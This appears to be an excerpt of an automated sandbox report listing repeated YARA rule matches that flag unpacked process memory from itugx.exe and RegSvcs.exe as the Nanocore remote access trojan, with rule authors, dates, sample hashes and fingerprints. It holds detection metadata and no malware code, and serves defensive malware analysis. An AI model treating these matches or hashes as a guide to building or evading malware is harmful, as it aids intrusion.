Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
